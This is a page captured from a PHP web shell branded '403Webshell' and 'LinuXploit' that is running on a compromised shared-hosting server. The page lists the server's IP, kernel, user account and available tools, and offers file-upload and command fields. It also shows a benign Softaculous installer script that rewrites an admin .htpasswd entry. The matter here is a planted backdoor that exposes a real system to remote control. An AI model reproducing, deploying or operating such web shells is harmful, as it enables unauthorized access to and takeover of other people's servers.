403Webshell
Server IP : 66.29.132.122  /  Your IP : 18.118.119.89
Web Server : LiteSpeed
System : Linux business142.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : admazpex ( 531)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/thread-self/root/var/softaculous/litecart/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/thread-self/root/var/softaculous/litecart/write_htpass.php
<?php
	
$username = '[[admin_username]]';
$enc_password = '[[encrypted_pass]]';
$htpasswd_file = '[[softpath]]/[[admin_folder]]/.htpasswd';

$htpasswd = file_get_contents($htpasswd_file);

if(preg_match('#(?<=^|\r\n|\r|\n)\#*('. preg_quote($username, '#') .'):.*?#', $htpasswd)){
	$htpasswd = preg_replace('#(?<=^|\r\n|\r|\n)(\#*'. preg_quote($username, '#') .'):[^\r|\n]+(\r\n?|\n)*#', '$1:{SHA}'. $enc_password . PHP_EOL, $htpasswd);
	echo '<htpasswd>'.$htpasswd.'</htpasswd>';
}
  
if(is_writable($htpasswd_file)){
	$htpasswd = file_put_contents($htpasswd_file, $htpasswd);
}
	
@unlink('write_htpass.php');
?>

	

Youez - 2016 - github.com/yon3zu
LinuXploit